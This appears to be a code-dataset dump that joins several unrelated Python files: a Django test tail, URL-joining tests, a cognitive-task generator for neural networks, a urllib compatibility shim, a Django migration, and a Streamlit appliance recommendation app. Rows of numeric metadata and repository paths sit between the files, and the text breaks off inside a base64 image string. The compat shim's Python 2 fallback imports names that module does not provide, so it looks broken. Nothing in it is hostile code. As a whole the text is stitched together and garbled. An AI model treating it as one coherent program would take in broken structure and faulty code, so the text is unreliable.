            assert Path(settings.MEDIA_ROOT).joinpath(file_value.file.name).exists()

        # assert that the project exists, but that there are not values
        if password:
            new_project = Project.objects.order_by('updated').last()

            assert response.status_code == 302
            assert response.url == '/projects/{}/'.format(new_project.id)

            # a new project, but no values
            assert Project.objects.count() == projects_count + 1
            assert new_project.values.count() == 0
        else:
            assert response.status_code == 302
            assert response.url.startswith('/account/login/')

            # no new project was created
            assert Project.objects.count() == projects_count
    else:
        assert response.status_code == 302
        assert response.url.startswith('/account/login/')


@pytest.mark.parametrize('username,password', users)
def test_project_create_import_post_import_project(db, settings, client, username, password):
    client.login(username=username, password=password)

    url = reverse('project_create_import')
    response = client.post(url, {
        'method': 'import_project'
    })

    if password:
        assert response.status_code == 400
    else:
        assert response.status_code == 302
        assert response.url.startswith('/account/login/')
33.411504
97
0.651304
912
7,551
5.245614
0.14693
0.096572
0.083612
0.100334
0.849289
0.845109
0.834866
0.832776
0.832776
0.789298
0
0.015646
0.229771
7,551
225
98
33.56
0.806912
0.053106
0
0.692771
0
0
0.138994
0.023539
0
0
0
0
0.26506
1
0.048193
false
0.204819
0.168675
0
0.216867
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
b57b1aa759e0d8828d52aeccd69678fc33d7f578
1,866
py
Python
tests/test_utils.py
mozillazg/huskar-python
f62a2d3636b2804a552bf59f76903cf2841d75c9
[ "MIT" ]
5
2019-09-29T03:09:31.000Z
2019-11-01T15:38:26.000Z
tests/test_utils.py
mozillazg/huskar-python
f62a2d3636b2804a552bf59f76903cf2841d75c9
[ "MIT" ]
4
2019-09-27T03:58:55.000Z
2019-09-27T06:34:10.000Z
tests/test_utils.py
mozillazg/huskar-python
f62a2d3636b2804a552bf59f76903cf2841d75c9
[ "MIT" ]
4
2019-09-27T06:03:30.000Z
2019-10-23T09:54:08.000Z
from __future__ import absolute_import

import pytest

from huskar_sdk_v2.six import unicode
from huskar_sdk_v2.utils import Counter, join_url


def test_counter():
    c = Counter(1)
    assert c.get() == 1
    assert unicode(c) == '<Counter init=1 now=1>'

    c.incr()
    assert c.get() == 2
    assert unicode(c) == '<Counter init=1 now=2>'

    c.reset()
    assert c.get() == 1
    assert unicode(c) == '<Counter init=1 now=1>'


@pytest.mark.parametrize('input,output', [
    (['http://example.com:8080', '/api', 'test', '233'],
     'http://example.com:8080/api/test/233'),
    (['http://example.com:8080', '/api/', 'test/', '233'],
     'http://example.com:8080/api/test/233'),
    (['http://example.com:8080', '/api/', '/test/', '233'],
     'http://example.com:8080/api/test/233'),
    (['http://example.com:8080', '/api', '/test/', '/233'],
     'http://example.com:8080/api/test/233'),
    (['http://example.com', '/api/', 'test/', '233'],
     'http://example.com/api/test/233'),
    (['http://example.com', '/api/', 'test/', '233/'],
     'http://example.com/api/test/233/'),
    (['http://example.com', '/api/test/', '233'],
     'http://example.com/api/test/233'),
    (['http://example.com', '/api/test/', '/233/'],
     'http://example.com/api/test/233/'),
    (['example.com', '/api/test/', '/233/'],
     'http://example.com/api/test/233/'),
    (['example.com:8080', '/api/test/', '/233/'],
     'http://example.com:8080/api/test/233/'),
    (['example.com:8080', '/api/test/'],
     'http://example.com:8080/api/test/'),
    (['example.com:8080', '/api/test'],
     'http://example.com:8080/api/test'),
    (['example.com:8080', 'api/test/'],
     'http://example.com:8080/api/test/'),
    (['example.com:8080', 'api/test'],
     'http://example.com:8080/api/test'),
])
def test_join_url(input, output):
    assert join_url(*input) == output
33.927273
59
0.568596
257
1,866
4.07393
0.136187
0.267431
0.294174
0.292264
0.770774
0.770774
0.770774
0.743075
0.743075
0.743075
0
0.091603
0.157556
1,866
54
60
34.555556
0.574427
0
0
0.369565
0
0
0.522508
0
0
0
0
0
0.152174
1
0.043478
false
0
0.086957
0
0.130435
0
0
0
0
null
1
1
1
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
b5965dd6b41565097bdeef284636baeb744a016c
12,625
py
Python
cgtasknet/tasks/reduce/go.py
Pugavkomm/-test-multy_cognitive_tasks
858e1f28813f09340211c57268daf4f8581a3459
[ "MIT" ]
null
null
null
cgtasknet/tasks/reduce/go.py
Pugavkomm/-test-multy_cognitive_tasks
858e1f28813f09340211c57268daf4f8581a3459
[ "MIT" ]
31
2021-12-28T09:44:10.000Z
2022-03-21T14:42:28.000Z
cgtasknet/tasks/reduce/go.py
Pugavkomm/cgtasknet
858e1f28813f09340211c57268daf4f8581a3459
[ "MIT" ]
1
2021-12-03T07:03:14.000Z
2021-12-03T07:03:14.000Z
from typing import NamedTuple, Optional, Tuple, Union

import numpy as np

from cgtasknet.tasks.reduce.reduce_task import (
    _generate_random_intervals,
    _generate_values,
    ReduceTaskCognitive,
    ReduceTaskParameters,
)


class GoTaskParameters(NamedTuple):
    dt: float = ReduceTaskParameters().dt
    trial_time: float = 0.75
    answer_time: float = ReduceTaskParameters().answer_time
    value: Union[float, list, tuple] = 1.0
    # task_type: str = "Go"  # Go, Rt, Dl
    negative_shift_trial_time: float = ReduceTaskParameters().negative_shift_trial_time
    positive_shift_trial_time: float = ReduceTaskParameters().positive_shift_trial_time


class GoRtTaskParameters(NamedTuple):
    dt: float = ReduceTaskParameters().dt
    trial_time: float = 0.75
    answer_time: float = ReduceTaskParameters().answer_time
    negative_shift_answer_time: float = 0.0
    positive_shift_answer_time: float = 0.0
    value: Union[float, list, tuple] = 1.0
    # task_type: str = "Go"  # Go, Rt, Dl
    negative_shift_trial_time: float = ReduceTaskParameters().negative_shift_trial_time
    positive_shift_trial_time: float = ReduceTaskParameters().positive_shift_trial_time


class GoTaskRandomModParameters(NamedTuple):
    go: GoTaskParameters = GoTaskParameters()
    n_mods: int = 2


class GoRtTaskRandomModParameters(NamedTuple):
    go_rt: GoRtTaskParameters = GoRtTaskParameters()
    n_mods: int = 2


class GoDlTaskParameters(NamedTuple):
    go: GoTaskParameters = GoTaskParameters()
    delay: float = 1.0
    negative_shift_delay_time: float = 0.0
    positive_shift_delay_time: float = 0.0


class GoDlTaskRandomModParameters(NamedTuple):
    go_dl: GoDlTaskParameters = GoDlTaskParameters()
    n_mods: int = 2


class GoTask(ReduceTaskCognitive):
    def __init__(
        self,
        params: GoTaskParameters = GoTaskParameters(),
        batch_size: int = 1,
        mode: str = "random",
        enable_fixation_delay: bool = False,
        uniq_batch: bool = False,
    ) -> None:
        super().__init__(
            params=params,
            batch_size=batch_size,
            mode=mode,
            enable_fixation_delay=enable_fixation_delay,
            uniq_batch=uniq_batch,
        )
        self._ob_size = 2
        self._act_size = 2

    def _identical_batches(self, batch_size: int = 1) -> Tuple[np.ndarray, np.ndarray]:
        dt = self._params.dt
        trial_time = _generate_random_intervals(
            dt,
            self._params.trial_time,
            self._params.negative_shift_trial_time,
            self._params.positive_shift_trial_time,
        )
        answer_time = round(self._params.answer_time / dt)
        inputs = np.zeros((trial_time + answer_time, batch_size, self._ob_size))
        target_outputs = np.zeros(
            (trial_time + answer_time, batch_size, self._act_size)
        )
        values = _generate_values(self._mode, batch_size, self._params.value)
        inputs[:trial_time, :, 0] = 1
        inputs[:, :, 1] = values
        target_outputs[:, :, 0] = inputs[:, :, 0]
        target_outputs[trial_time:, :, 1] = values
        return inputs, target_outputs

    def _one_dataset(self) -> Tuple[np.ndarray, np.ndarray]:
        if self._uniq_batch:
            return self._unique_every_batch()
        else:
            return self._identical_batches(self._batch_size)

    def one_dataset(self) -> Tuple[np.ndarray, np.ndarray]:
        """ """
        return self._one_dataset()

    @property
    def name(self) -> str:
        return "Go"


class GoRtTask(GoTask):
    def __init__(
        self,
        params: GoRtTaskParameters = GoRtTaskParameters(),
        batch_size: int = 1,
        mode: str = "random",
        enable_fixation_delay: bool = False,
        uniq_batch: bool = False,
    ) -> None:
        super().__init__(
            params=params,
            batch_size=batch_size,
            mode=mode,
            enable_fixation_delay=enable_fixation_delay,
            uniq_batch=uniq_batch,
        )
        self._ob_size = 2
        self._act_size = 2

    def _identical_batches(self, batch_size: int = 1) -> Tuple[np.ndarray, np.ndarray]:
        dt = self._params.dt
        trial_time = _generate_random_intervals(
            dt,
            self._params.trial_time,
            self._params.negative_shift_trial_time,
            self._params.positive_shift_trial_time,
        )
        answer_time = _generate_random_intervals(
            dt,
            self._params.answer_time,
            self._params.negative_shift_answer_time,
            self._params.positive_shift_answer_time,
        )
        inputs = np.zeros((trial_time + answer_time, batch_size, self._ob_size))
        target_outputs = np.zeros(
            (trial_time + answer_time, batch_size, self._act_size)
        )
        values = _generate_values(self._mode, batch_size, self._params.value)
        inputs[:, :, 0] = 1
        inputs[trial_time:, :, 1] = values
        target_outputs[:trial_time, :, 0] = 1
        target_outputs[trial_time:, :, 1] = values
        return inputs, target_outputs

    @property
    def name(self) -> str:
        return "GoRt"


class GoDlTask(GoTask):
    def __init__(
        self,
        params: Union[GoDlTaskParameters, GoRtTaskParameters] = GoDlTaskParameters(),
        batch_size: int = 1,
        mode: str = "random",
        enable_fixation_delay: bool = False,
        uniq_batch: bool = False,
    ) -> None:
        super().__init__(
            params=params,
            batch_size=batch_size,
            mode=mode,
            enable_fixation_delay=enable_fixation_delay,
            uniq_batch=uniq_batch,
        )
        self._ob_size = 2
        self._act_size = 2

    def _identical_batches(self, batch_size: int = 1) -> Tuple[np.ndarray, np.ndarray]:
        dt = self._params.go.dt
        trial_time = _generate_random_intervals(
            dt,
            self._params.go.trial_time,
            self._params.go.negative_shift_trial_time,
            self._params.go.positive_shift_trial_time,
        )
        answer_time = round(self._params.go.answer_time / dt)
        delay_time = _generate_random_intervals(
            dt,
            self._params.delay,
            self._params.negative_shift_delay_time,
            self._params.positive_shift_delay_time,
        )
        inputs = np.zeros(
            (trial_time + answer_time + delay_time, batch_size, self._ob_size)
        )
        target_outputs = np.zeros(
            (trial_time + answer_time + delay_time, batch_size, self._act_size)
        )
        values = _generate_values(self._mode, batch_size, self._params.go.value)
        inputs[: trial_time + delay_time, :, 0] = 1
        inputs[:trial_time, :, 1] = values
        target_outputs[:, :, 0] = inputs[:, :, 0]
        target_outputs[trial_time + delay_time :, :, 1] = values
        return inputs, target_outputs

    @property
    def name(self) -> str:
        return "GoDl"


class GoTaskRandomMod(GoTask):
    def __init__(
        self,
        params: GoTaskRandomModParameters = GoTaskRandomModParameters(),
        batch_size: int = 1,
        mode: str = "random",
        enable_fixation_delay: bool = False,
        uniq_batch: bool = False,
    ):
        super().__init__(
            params=params.go,
            batch_size=batch_size,
            mode=mode,
            enable_fixation_delay=enable_fixation_delay,
            uniq_batch=uniq_batch,
        )
        self._n_mods = params.n_mods
        self._ob_size += self._n_mods - 1
        self._act_size += self._n_mods - 1

    def _one_dataset_mod(self, mod: int) -> Tuple[np.ndarray, np.ndarray]:
        """Generate a single dataset .

        Returns:
            Tuple[np.ndarray, np.ndarray]: [inputs, target outputs]
        """
        temp, temp_outputs = self._one_dataset()
        t = temp.shape[0]
        inputs = np.zeros((t, self._batch_size, self._ob_size))
        inputs[:, :, 0] = temp[:, :, 0]
        inputs[:, :, 1 + mod] = temp[:, :, 1]
        target_outputs = np.zeros((t, self._batch_size, self._act_size))
        target_outputs[:, :, 0] = temp_outputs[:, :, 0]
        target_outputs[:, :, 1 + mod] = temp_outputs[:, :, 1]
        return inputs, target_outputs

    def one_dataset(self, mode: Optional[int] = None) -> Tuple[np.ndarray, np.ndarray]:
        if mode is None:
            mode = np.random.randint(0, self._n_mods)
        return self._one_dataset_mod(mode)

    @property
    def name(self):
        return "GoTaskRandomMod"


class GoRtTaskRandomMod(GoRtTask):
    def __init__(
        self,
        params: GoRtTaskRandomModParameters = GoRtTaskRandomModParameters(),
        batch_size: int = 1,
        mode: str = "random",
        enable_fixation_delay: bool = False,
        uniq_batch: bool = False,
    ):
        super().__init__(
            params=params.go_rt,
            batch_size=batch_size,
            mode=mode,
            enable_fixation_delay=enable_fixation_delay,
            uniq_batch=uniq_batch,
        )
        self._n_mods = params.n_mods
        self._ob_size += self._n_mods - 1
        self._act_size += self._n_mods - 1

    def _one_dataset_mod(self, mod: int) -> Tuple[np.ndarray, np.ndarray]:
        """Generate a single dataset .

        Returns:
            Tuple[np.ndarray, np.ndarray]: [inputs, target outputs]
        """
        temp, temp_outputs = self._one_dataset()
        t = temp.shape[0]
        inputs = np.zeros((t, self._batch_size, self._ob_size))
        inputs[:, :, 0] = temp[:, :, 0]
        inputs[:, :, 1 + mod] = temp[:, :, 1]
        target_outputs = np.zeros((t, self._batch_size, self._act_size))
        target_outputs[:, :, 0] = temp_outputs[:, :, 0]
        target_outputs[:, :, 1 + mod] = temp_outputs[:, :, 1]
        return inputs, target_outputs

    def one_dataset(self, mod: Optional[int] = None) -> Tuple[np.ndarray, np.ndarray]:
        if mod is None:
            mod = np.random.randint(0, self._n_mods)
        return self._one_dataset_mod(mod)

    @property
    def name(self) -> str:
        return "GoRtTaskRandomMod"


class GoDlTaskRandomMod(GoDlTask):
    def __init__(
        self,
        params: GoDlTaskRandomModParameters = GoDlTaskRandomModParameters(),
        batch_size: int = 1,
        mode: str = "random",
        enable_fixation_delay: bool = False,
        uniq_batch: bool = False,
    ):
        super().__init__(
            params=params.go_dl,
            batch_size=batch_size,
            mode=mode,
            enable_fixation_delay=enable_fixation_delay,
            uniq_batch=uniq_batch,
        )
        self._n_mods = params.n_mods
        self._ob_size += self._n_mods - 1
        self._act_size += self._n_mods - 1

    def _one_dataset_mod(self, mod: int) -> Tuple[np.ndarray, np.ndarray]:
        """Generate a single dataset .

        Returns:
            Tuple[np.ndarray, np.ndarray]: [inputs, target outputs]
        """
        temp, temp_outputs = self._one_dataset()
        t = temp.shape[0]
        inputs = np.zeros((t, self._batch_size, self._ob_size))
        inputs[:, :, 0] = temp[:, :, 0]
        inputs[:, :, 1 + mod] = temp[:, :, 1]
        target_outputs = np.zeros((t, self._batch_size, self._act_size))
        target_outputs[:, :, 0] = temp_outputs[:, :, 0]
        target_outputs[:, :, 1 + mod] = temp_outputs[:, :, 1]
        return inputs, target_outputs

    def one_dataset(self, mod: Optional[int] = None) -> Tuple[np.ndarray, np.ndarray]:
        if mod is None:
            mod = np.random.randint(0, self._n_mods)
        return self._one_dataset_mod(mod)

    @property
    def name(self) -> str:
        return "GoDlTaskRandomMod"


class GoTask1(GoTaskRandomMod):
    def one_dataset(self, mod=0) -> Tuple[np.ndarray, np.ndarray]:
        return self._one_dataset_mod(mod)


class GoTask2(GoTaskRandomMod):
    def one_dataset(self, mod=1) -> Tuple[np.ndarray, np.ndarray]:
        return self._one_dataset_mod(mod)


class GoRtTask1(GoRtTaskRandomMod):
    def one_dataset(self, mod=0) -> Tuple[np.ndarray, np.ndarray]:
        return self._one_dataset_mod(mod)


class GoRtTask2(GoRtTaskRandomMod):
    def one_dataset(self, mod=1) -> Tuple[np.ndarray, np.ndarray]:
        return self._one_dataset_mod(mod)


class GoDlTask1(GoDlTaskRandomMod):
    def one_dataset(self, mod=0) -> Tuple[np.ndarray, np.ndarray]:
        return self._one_dataset_mod(mod)


class GoDlTask2(GoDlTaskRandomMod):
    def one_dataset(self, mod=1) -> Tuple[np.ndarray, np.ndarray]:
        return self._one_dataset_mod(mod)
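# Hedged usage sketch (not part of the module). The time dimension varies with
# the randomised trial interval; the last axis is (fixation, value) per modality:
#
#     task = GoTask(batch_size=8)
#     inputs, targets = task.one_dataset()
#     assert inputs.shape == targets.shape        # (T, 8, 2) for the base task
#
#     mod_task = GoTaskRandomMod(batch_size=8)    # n_mods=2 -> ob_size becomes 3
#     i2, t2 = mod_task.one_dataset()
#     assert i2.shape[-1] == 3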
32.455013
87
0.615683
1,469
12,625
4.955071
0.072158
0.049457
0.038467
0.043962
0.811513
0.777991
0.741998
0.731831
0.729908
0.688419
0
0.011362
0.27501
12,625
388
88
32.53866
0.783896
0.028832
0
0.667763
1
0
0.00783
0
0
0
0
0
0
1
0.095395
false
0
0.009868
0.039474
0.322368
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
a9422c41c585d862e6be1bcd3cc08926dd6ef04d
162
py
Python
cloudfrontsigner/compat.py
gjo/cloudfrontsigner
d9ee56a62016db927c5541f2f1c6f95e65706928
[ "BSD-3-Clause" ]
null
null
null
cloudfrontsigner/compat.py
gjo/cloudfrontsigner
d9ee56a62016db927c5541f2f1c6f95e65706928
[ "BSD-3-Clause" ]
null
null
null
cloudfrontsigner/compat.py
gjo/cloudfrontsigner
d9ee56a62016db927c5541f2f1c6f95e65706928
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*-
try:
    from urllib.parse import parse_qs, urlencode, urlparse
except ImportError:
    # Python 2 fallback: these names live in two different modules there,
    # so importing all three from urllib would itself raise ImportError.
    from urllib import urlencode
    from urlparse import parse_qs, urlparse
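# Quick check that the shim exposes the expected callables (illustrative):
#
#     parts = urlparse('https://example.com/path?a=1&a=2')
#     assert parse_qs(parts.query) == {'a': ['1', '2']}
#     assert urlencode({'a': 1}) == 'a=1'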
23.142857
58
0.722222
21
162
5.47619
0.619048
0.173913
0.226087
0.382609
0.521739
0
0
0
0
0
0
0.007519
0.179012
162
6
59
27
0.857143
0.12963
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.75
0
0.75
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
a9876b4a3505e1f79e53d817367a55021eaac9da
3,009
py
Python
SACWebApp/mainPage/migrations/0013_auto_20201221_2345.py
feng-jj/SAC-Project1
58941f85b805bc993059f89fe913c147da14210e
[ "MIT" ]
1
2020-07-19T01:53:05.000Z
2020-07-19T01:53:05.000Z
SACWebApp/mainPage/migrations/0013_auto_20201221_2345.py
feng-jj/SAC-Project1
58941f85b805bc993059f89fe913c147da14210e
[ "MIT" ]
1
2020-07-15T15:43:17.000Z
2020-07-15T15:43:17.000Z
SACWebApp/mainPage/migrations/0013_auto_20201221_2345.py
feng-jj/SAC-Project1
58941f85b805bc993059f89fe913c147da14210e
[ "MIT" ]
null
null
null
# Generated by Django 3.1.3 on 2020-12-22 04:45

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('mainPage', '0012_auto_20201220_2057'),
    ]

    operations = [
        migrations.AddField(
            model_name='advocacy',
            name='month',
            field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'),
        ),
        migrations.AddField(
            model_name='clinical',
            name='month',
            field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'),
        ),
        migrations.AddField(
            model_name='clinical_voca',
            name='month',
            field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'),
        ),
        migrations.AddField(
            model_name='map',
            name='month',
            field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'),
        ),
        migrations.AddField(
            model_name='ov',
            name='month',
            field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'),
        ),
        migrations.AddField(
            model_name='safe_clinic',
            name='month',
            field=models.CharField(blank=True, choices=[('January', 'January'), ('February', 'February'), ('March', 'March'), ('April', 'April'), ('May', 'May'), ('June', 'June'), ('July', 'July'), ('August', 'August'), ('September', 'September'), ('October', 'October'), ('November', 'November'), ('December', 'December')], max_length=9, verbose_name='Month'),
        ),
    ]
68.386364
361
0.562645
289
3,009
5.778547
0.197232
0.064671
0.082635
0.097006
0.877246
0.877246
0.877246
0.877246
0.877246
0.877246
0
0.015059
0.18345
3,009
43
362
69.976744
0.664632
0.014955
0
0.648649
1
0
0.345712
0.007765
0
0
0
0
0
1
0
false
0
0.027027
0
0.108108
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
a993863a004acd54447e1379e24a652df19906e9
116,198
py
Python
Customer_Recommendation.py
dogudogru/Customer-Recomendation-Project
948e34145af1a753b6171a779b4f7b5b00aa67eb
[ "MIT" ]
1
2022-01-13T11:58:50.000Z
2022-01-13T11:58:50.000Z
Customer_Recommendation.py
dogudogru/Customer-Recomendation-Project
948e34145af1a753b6171a779b4f7b5b00aa67eb
[ "MIT" ]
null
null
null
Customer_Recommendation.py
dogudogru/Customer-Recomendation-Project
948e34145af1a753b6171a779b4f7b5b00aa67eb
[ "MIT" ]
null
null
null
import base64
import time

import pandas as pd
import numpy as np
import requests
import streamlit as st
from PIL import Image, ImageDraw, ImageFont
from pandas.core.frame import DataFrame
from requests.api import options

data = pd.read_csv("data1.csv")
data2 = data.drop(data.columns[0], axis=1)
data_b = pd.read_csv("data2.csv")
data2_b = data_b.drop(data_b.columns[0], axis=1)

url_cam = "https://www.bekokibris.com/wp-content/uploads/2020/04/BK9102EYS1.jpg"
url_bul = "https://statics.vestel.com.tr/productimages/20264045_r1_900_1254.jpg"
url_buzdo = "https://cdn.akakce.com/samsung/samsung-rb50rs334sa-a-kombi-no-frost-x.jpg"

im = Image.open(requests.get(url_cam, stream=True).raw)
# im = im.resize((500, 500))
im2 = Image.open(requests.get(url_bul, stream=True).raw)
# im2 = im2.resize((500, 500))
im3 = Image.open(requests.get(url_buzdo, stream=True).raw)
# im3 = im3.resize((500, 500))

st.set_page_config(page_title='Customer Recommendation Project',
                   page_icon=':house_with_garden:')

# Hide the default Streamlit menu and footer.
st.markdown("""
<style>
#MainMenu {visibility: hidden;}
footer {visibility: hidden;}
</style>
""", unsafe_allow_html=True)

# Fit everything onto a single page by zeroing the container padding.
padding = 0
st.markdown(f"""
<style>
.reportview-container .main .block-container{{
    padding-top: {padding}rem;
    padding-right: {padding}rem;
    padding-left: {padding}rem;
    padding-bottom: {padding}rem;
}}
</style>
""", unsafe_allow_html=True)

# Background image for the page body and the sidebar.
st.markdown(
    """
    <style>
    .reportview-container {
        background: url("https://www.birbeymetal.com.tr/wp-content/uploads/2019/02/Savin-NY-Website-Background-Web.jpg")
    }
    .sidebar .sidebar-content {
        background: url("https://www.birbeymetal.com.tr/wp-content/uploads/2019/02/Savin-NY-Website-Background-Web.jpg")
    }
    </style>
    """,
    unsafe_allow_html=True
)

options_m = [' ', 'Çamaşır Makinesi', 'Bulaşık Makinesi']
machine = st.sidebar.selectbox('Ne arıyorsunuz? 👉', options=options_m)

dil = ["TR", "EN"]
col1, col2, col3, col4, col5, col6, col7, col8, col9, col10, col11, col12 = \
    st.columns([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5])
with col12:
    dil_secenek = st.radio("Language", dil)
    st.write('<style>div.row-widget.stRadio > div{flex-direction:row;}</style>',
             unsafe_allow_html=True)

dataf = data2
dataf_b = data2_b


def score_column(src, dst, column, mapping, default=1):
    # Map raw feature labels to ordinal scores; any unmapped label gets the default.
    dst[column] = src[column].map(mapping).fillna(default).astype(int)


## ÇAMAŞIR (washing machines)
brand1 = ["Bosch", "Siemens", "Samsung", "Electrolux"]
brand2 = ["Arçelik", "Vestel", "LG", "Profilo", "Beko"]

data4 = data2.copy()
data4['brand'] = data2['brand'].apply(
    lambda b: 3 if b in brand1 else (2 if b in brand2 else 1))

# Three-level features: preferred label scores 3, middle label 2, anything else 1.
for col, mapping in {
    'capacity':     {"Yüksek Kapasite": 3, "Orta Kapasite": 2},
    'cycle':        {"Yüksek Devir": 3, "Orta Devir": 2},
    'size':         {"Standart üstü": 3, "Standart Boyut": 2},
    'energy_usage': {"Çok önemli": 3, "Önemli": 2},
}.items():
    score_column(data2, data4, col, mapping)

# Binary features: "VAR" (present) scores 2, anything else 1.
for col in ['blanket', 'wifi', 'load_sensor', 'delay', 'control_panel',
            'vapor', 'anti_alergy', 'baby_p', 'sensitive_p', 'child_lock']:
    score_column(data2, data4, col, {"VAR": 2})

# A product's total score ("puan") is the sum of all of its feature scores.
feature_cols = data4.drop(["full_name", "price", "image"], axis=1).columns
data4["puan"] = data4[feature_cols].sum(axis=1)
dataf["puan"] = data4["puan"]

len_lst1 = []
len_lst2 = []

## BULAŞIK (dishwashers)
data4_b = data2_b.copy()
data4_b['brand'] = data2_b['brand'].apply(
    lambda b: 3 if b in brand1 else (2 if b in brand2 else 1))

for col, mapping in {
    'capacity':          {"Yüksek Kapasite": 3, "Orta Kapasite": 2},
    'type_':             {"Ankastre": 3, "Solo": 2},
    'size':              {"Standart üstü": 3, "Standart Boyut": 2},
    'energy_usage':      {"Çok önemli": 3, "Önemli": 2},
    'number_of_program': {"9+": 3, "5-8 Program": 2},
    'water_consumption': {"Düşük Tüketim": 3, "Orta Tüketim": 2},
}.items():
    score_column(data2_b, data4_b, col, mapping)

for col in ['wifi', 'control_panel']:
    score_column(data2_b, data4_b, col, {"VAR": 2})
score_column(data2_b, data4_b, 'box', {"Çekmeceli": 2})

feature_cols_b = data4_b.drop(["full_name", "price", "image"], axis=1).columns
data4_b["puan"] = data4_b[feature_cols_b].sum(axis=1)
dataf_b["puan"] = data4_b["puan"].astype(int)
dataf_b["price"] = dataf_b.price.astype(float)

if dil_secenek == "TR":
    if machine == " ":
        col1, col2, col3, col4, col5, col6, col7, col8, col9, col10, col11, col12 = \
            st.columns([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5])
        with col12:
            button = st.button("Beğen 👍")
            if button:
                st.write("Teşekkür ederiz 💗")
                # Persist a simple "like" counter on disk.
                with open("counter.txt", "r") as file1:
                    count = file1.read()
                count_int = int(count.replace("'", "")) + 1
                with open('counter.txt', 'w') as f:
                    f.write(str(count_int))
        st.title("Proje hakkında")
        st.markdown("<b><i>Tüketici Ürün Rehberi </i></b>, beyaz eşya ihtiyacı bulunan tüketicilerin, kendileri için en iyi ürünü seçmesine yardım etmeyi amaçlayan bir Python projesidir.", unsafe_allow_html=True)
        st.markdown("İnsanlar, etkileşimde bulundukları e-ticaret web sitelerinin, kim olduklarını ve neyle ilgilendiklerini hatırlamalarını ve önceki etkinliklerine dayalı olarak yeni içerik ve ürünler ile kendi ihtiyaçlarına uygun önerilerde bulunulmasını bekler.
Bu talepleri karşılayamayan herhangi bir uygulama veya web sitesi, kullanıcılarının hızla azaldığını görecektir.") st.markdown("Tüketici Ürün Rehberi, belirli bir kullanıcının ihtiyaçlarına göre satın almak istediği eşyalar için öneriler oluşturmak amacı ile tasarlanmış bir yazılım aracıdır.") st.markdown(" ") st.title("Proje Geliştiricileri") st.markdown(" ") col1, col2, col3, col4, col5,col6,col7 = st.columns([1,1,1,1,1,1,1]) with col1: st.markdown("<b><i>Mert Türkyılmaz</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAAXNSR0IArs4c6QAAEWtJREFUaEPVWXl019WV/3zuNyF7AgFCAgmIyhoWBRcCilqhajvWDeiMSyuIOi1dXOrYOq069rTO6bRje7pbDNa6VMClteJSC1XZBBTZt0QgCSQkIRASyPq9nzkvUQ4JUJdO/+g7h3M437zfe+/z7r2fe+/nEf/kg//k58c/FMAtL6xJbW9uuwCmooYYD2ZGNg2u/q62YkNCHB3o0fDwrWe1/T2X+P8O4Kb5y89pS4hKo9hvE5lEoMSEBFFXOxSb+BhMfQnbH8Vtr8eWMDaOsOHRq4p2fRIgnxjArD8szVBbNJNCdoLai9uYcDMN7QRiCec6vJaKKgkNh5AjQwkdo2H6vYAKgBNNOCJgfYP0bF+0RA0JPVJ/d/Wk6o8D5GMDuP9+WdnoFTMVczYjbJE0mFSC3P5q9N6C9SbQKikZxFCSqyANk9sRmL8AcKyEmSR+ASgCsFvA5yH2AfGTedOKHvqHAZg+f36UYfkvgFaDGP1EXUjDk3TUyDBQMdJItIsaCHAbnamghot4DcB7dE6GxSMFWyEoj87+MLWA1mqKF0sBJBLN8frc6UV//ShAPrIFvjB/+YAE41fdcboZPgvgHQjvwpgOVwagLICtoNQB0L3IxfUW4U+SCgG7HK7tZnIXz5C42+jtIPoAWAm3QTDvKdmvYVqHKKpJjGz/w5efdeRvAflIAGYuWP4vlN0k+lnhhkF7Q5II9hA03KAyd2aaYY8cwxxsoukZgqmS/l2GfRbzgOhnEDgE49sQCgFVCDwAcLzkJSRySTYiRptMCQSa0lIPXvXTz3ym5WQgPhTATQtXXC4pMMoZAF42eAS3DBkKCB1050EaGwHvKWCgga8K2ALgxuD7MG50aSCBfDiXEkgPLCTYYoMPcWE8yVSHdhpY6dJgI3pL9qM44o8SY01Vj/Y3iq84b++JQJwUwA2PrUtLSD1yCxyX01ADMAY0SpCFhQxc60BMKQ3AOJi9DfgrEIskXE